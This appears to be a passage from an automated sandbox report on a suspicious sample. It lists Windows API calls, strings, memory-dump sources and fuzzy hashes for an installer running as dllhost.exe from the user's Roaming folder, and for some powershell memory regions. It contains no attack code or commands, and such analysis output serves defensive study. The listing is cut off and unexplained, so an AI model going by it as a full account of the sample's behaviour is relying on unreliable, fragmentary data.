• MulDiv.KERNEL32 ref: 00402E20
• wsprintfW.USER32 ref: 00402E30
• SetWindowTextW.USER32(?,?), ref: 00402E40
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
Strings
• verifying installer: %d%%, xrefs: 00402E2A
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
• Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
• Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
• Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
• GlobalFree.KERNEL32(?), ref: 00402950
• GlobalFree.KERNEL32(00000000), ref: 00402963
• CloseHandle.KERNEL32(?), ref: 0040297B
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
• Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
• Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
• Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
APIs
• lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF), ref: 00404B0D
• wsprintfW.USER32 ref: 00404B16
• SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
Strings
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$6B
• API String ID: 3540041739-3884863406
• Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
• Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
• Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
• Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
APIs
• WideCharToMultiByte.KERNEL32(?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025E2
• lstrlenA.KERNEL32(C:\Windows\Intragantes.geo,?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025ED
Strings
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: ByteCharMultiWidelstrlen
• String ID: C:\Windows\Intragantes.geo$sarcoderma
• API String ID: 3109718747-3933101654
• Opcode ID: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
• Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
• Opcode Fuzzy Hash: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
• Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                              • LoadImageW.USER32 ref: 00401D8B
                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                              • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                                              • CharPrevW.USER32(?,00000000), ref: 00405B2D
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-4017390910
                                                                              APIs
                                                                              • DestroyWindow.USER32 ref: 00402E70
                                                                              • GetTickCount.KERNEL32(00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E8E
                                                                              • CreateDialogParamW.USER32 ref: 00402EAB
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402EB9
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                              • String ID:
                                                                              • API String ID: 2102729457-0
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00405253
                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                                                                • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,7570D4C4,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                                                              • GlobalFree.KERNEL32(?), ref: 004038E6
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Free$GlobalLibrary
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 1100898210-4017390910
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Roaming,00402F2D,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\dllhost.exe,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                                                              • CharPrevW.USER32(?,00000000), ref: 00405B7F
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming, xrefs: 00405B69
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\AppData\Roaming
                                                                              • API String ID: 2709904686-2707566632
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                                                                              • CharNextA.USER32(00000000), ref: 00405CDC
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'p$4'p$4'p$4'p$h%f$h%f$tPp$tPp$$p$$p$$p$$p$$p$$p$$p$$p$$p
                                                                              • API String ID: 0-3500168434
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'p$4'p$8#f$8#f$h%f$h%f
                                                                              • API String ID: 0-3085610555
                                                                              • Opcode ID: a6ea8b0c48f63d12f45992d066ed7d289332e9e33ef286719b4bef887b5f7655
                                                                              • Instruction ID: 6ae1fb171a560d4501563f33035d531620291973539e92c2951d592ba1f513f7
                                                                              • Opcode Fuzzy Hash: a6ea8b0c48f63d12f45992d066ed7d289332e9e33ef286719b4bef887b5f7655
                                                                              • Instruction Fuzzy Hash: 5A228034B00204DFCB25EF69C454A6ABBB2FF89310F64C4AAD8469B355DB75EC42CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'p$4'p$$p$$p$$p
                                                                              • API String ID: 0-2334450948
                                                                              • Opcode ID: 00b40268ab206e7467671cc96a7eb36e90e4959961727d6f38f4c1772ba6a45e
                                                                              • Instruction ID: 066301d1da5eb98b7f6ddf52a5499a4f37e6df35e2116b9b01d71a40b4d1409c
                                                                              • Opcode Fuzzy Hash: 00b40268ab206e7467671cc96a7eb36e90e4959961727d6f38f4c1772ba6a45e
                                                                              • Instruction Fuzzy Hash: 7841C435B042418FEB2CAE69C440A6ABBE2EFC5310F1884FBC456CB295DB38E945D791
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'p$$p$$p
                                                                              • API String ID: 0-2931952147
                                                                              • Opcode ID: 8a11d9b7d56131b6d9014a8f2a6ec0719d0ca28e458efa9c7fc1ba623529b4e4
                                                                              • Instruction ID: 37857e06e00e224299798349d6c89efe1c0704598f8aaec7d95e8400906e8d62
                                                                              • Opcode Fuzzy Hash: 8a11d9b7d56131b6d9014a8f2a6ec0719d0ca28e458efa9c7fc1ba623529b4e4
                                                                              • Instruction Fuzzy Hash: FD31C630A05204DFEB24EF5AC4447A97BB2FF95310F1880E6E55A8B291D77CF980CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'p$$p$$p
                                                                              • API String ID: 0-2931952147
                                                                              • Opcode ID: b8abc9605afa67f5bd1164a82f72358366a7b0857ba99dfc52e8b670973d4991
                                                                              • Instruction ID: 96f321a6a38ab1931d22f6c4747341c4fe6cb9f123632a893acf65c0fdcbc17c
                                                                              • Opcode Fuzzy Hash: b8abc9605afa67f5bd1164a82f72358366a7b0857ba99dfc52e8b670973d4991
                                                                              • Instruction Fuzzy Hash: F9218031B00205DFFF2CEE55C940A69B7B5EF84711F0880FAC81A8B1A0E738E941EB51
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bcd4f7e251f37cb7f4658fc64381296b1405e48efdd7b0bb8c35ee1b0c365f8b
                                                                              • Instruction ID: 1ebdec76db902a39dfa9bc8f8264596c962bfbdfa7e16eeb5c9177a3d1869e16
                                                                              • Opcode Fuzzy Hash: bcd4f7e251f37cb7f4658fc64381296b1405e48efdd7b0bb8c35ee1b0c365f8b
                                                                              • Instruction Fuzzy Hash: 68C2C270A093849FCB02DF68D894A9DBFB1AF46314F198496D484DB363CB34DC1ACBA5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c7aa053a9ab608950ec745560178aa8325ed42913618c377e0f11e8c8d73ac1c
                                                                              • Instruction ID: 23963711ee2425726a3faa4cc2fab0f0bc72562669887ad3eaec5ddb42a601d6
                                                                              • Opcode Fuzzy Hash: c7aa053a9ab608950ec745560178aa8325ed42913618c377e0f11e8c8d73ac1c
                                                                              • Instruction Fuzzy Hash: 54022D74A10219DFDB05CF98C884A9EBBF2FF89310F248559E805AB365CB71ED91CB90
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2da5ca4df990d42b6ade154fb317d3bf69fec3c8be3eb3c97f88cf33ec9904c6
                                                                              • Instruction ID: eeeef71b3caebaa0d7f5a4c83e9515b831dcf439a92081a0b5e6b3dd181728fd
                                                                              • Opcode Fuzzy Hash: 2da5ca4df990d42b6ade154fb317d3bf69fec3c8be3eb3c97f88cf33ec9904c6
                                                                              • Instruction Fuzzy Hash: C7F15B70A11249DFCB05CF98D490A9DFBB2FF49314F258599E844AB366CB31EC95CB90
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 105d47d70ac952123ea30ca19b5c6477311c41b4da09cc5c34d9f17541f602d3
                                                                              • Instruction ID: 124eb608670e44be35c7df10cfdeb30d46dae6a0efaf7fa1460d85d7b4fe598c
                                                                              • Opcode Fuzzy Hash: 105d47d70ac952123ea30ca19b5c6477311c41b4da09cc5c34d9f17541f602d3
                                                                              • Instruction Fuzzy Hash: 6CE14C74A10219AFDB05CF99D480A9EFBB2FF89310F648559E805AB355CB31ED92CF90
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 05d248d81319725d4f3a16b260285e9d4de639338df37867a376119ee5b841bf
                                                                              • Instruction ID: 8673830d24704a14d9759565818954e1fbde02687af97afb5230448f13a15737
                                                                              • Opcode Fuzzy Hash: 05d248d81319725d4f3a16b260285e9d4de639338df37867a376119ee5b841bf
                                                                              • Instruction Fuzzy Hash: E3E16E70A142499FCB05CFA8D494B9DBFB1BF4A314F298099E844AB352CB71DD56CB90
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6dc06fa3f0a1d827a3613172e8aaac55e252835527bd3e64b397c55e7773a17f
                                                                              • Instruction ID: 30a084c7d87a7f786f05e0c7dcda95ddbd9b0c4230be5c9afbb9dfc9c289eb25
                                                                              • Opcode Fuzzy Hash: 6dc06fa3f0a1d827a3613172e8aaac55e252835527bd3e64b397c55e7773a17f
                                                                              • Instruction Fuzzy Hash: 3B516E70A046058FCB15CF58C990AAEBBB2FF49310F298199E955E73A1C735AC91CB91
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 519606e7bb373df8c3fef962a6684d118f516340ce9dd1128abbb8e890db618a
                                                                              • Instruction ID: eb4b5e32d2acf5f1ebf7ec04759a3d4d03f196e770ef6a09b3dfa4f195a7b034
                                                                              • Opcode Fuzzy Hash: 519606e7bb373df8c3fef962a6684d118f516340ce9dd1128abbb8e890db618a
                                                                              • Instruction Fuzzy Hash: CF316B70A042458FCB11CF5CC8909AAFBF1FF4A310B25869AD944EB352CB35EC51CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775651773.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b0a141373a2c32db71c05827b683ba50be49d8dd4f99dec526298a3969414f9
                                                                              • Instruction ID: f0092c60eb54f35c6fe5ab4d09b6195edcdf0b0ed44e92461cafbec55a3f616d
                                                                              • Opcode Fuzzy Hash: 5b0a141373a2c32db71c05827b683ba50be49d8dd4f99dec526298a3969414f9
                                                                              • Instruction Fuzzy Hash: 3C21D6B5604340EFDF05CF54D9C4B26BFA2FB84714F24C5AAE8094A256C336D856CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775651773.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 83aee6eae617b757139e57b205b5b986050a0917db128b2ff60648e8a4d51f7d
                                                                              • Instruction ID: e2e8a9a6dc7a5de4c15eb1224084d4e21fd3f967016298df26ad4042adc5d905
                                                                              • Opcode Fuzzy Hash: 83aee6eae617b757139e57b205b5b986050a0917db128b2ff60648e8a4d51f7d
                                                                              • Instruction Fuzzy Hash: D8219D76504240DFDF06CF10D9C4B16BFA2FB44314F24C5AAE8494A256C33AD86ACFA1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775651773.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8fe94fd460b5fb1884ad6ed34f1b68ab1a575a5ee305ccaf6a0d3d2f3d6b2454
                                                                              • Instruction ID: 8b872844e4e96289b07614c75a5c857dfbc60c64760dc951b5d9c83d024f044c
                                                                              • Opcode Fuzzy Hash: 8fe94fd460b5fb1884ad6ed34f1b68ab1a575a5ee305ccaf6a0d3d2f3d6b2454
                                                                              • Instruction Fuzzy Hash: 95018471504340AAEB104E15DC84B66BF98EF41724F2C855AFC494F286C7799845C6B1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775651773.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_19d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b2790ffaa31424cea53fb80af2b8d9279f50d8c6395cf85138d81afb0f36e0f
                                                                              • Instruction ID: 5bccc1b75e4d53186136e51cde5a73356bb70c45f31f614e3f7856614ddcc691
                                                                              • Opcode Fuzzy Hash: 9b2790ffaa31424cea53fb80af2b8d9279f50d8c6395cf85138d81afb0f36e0f
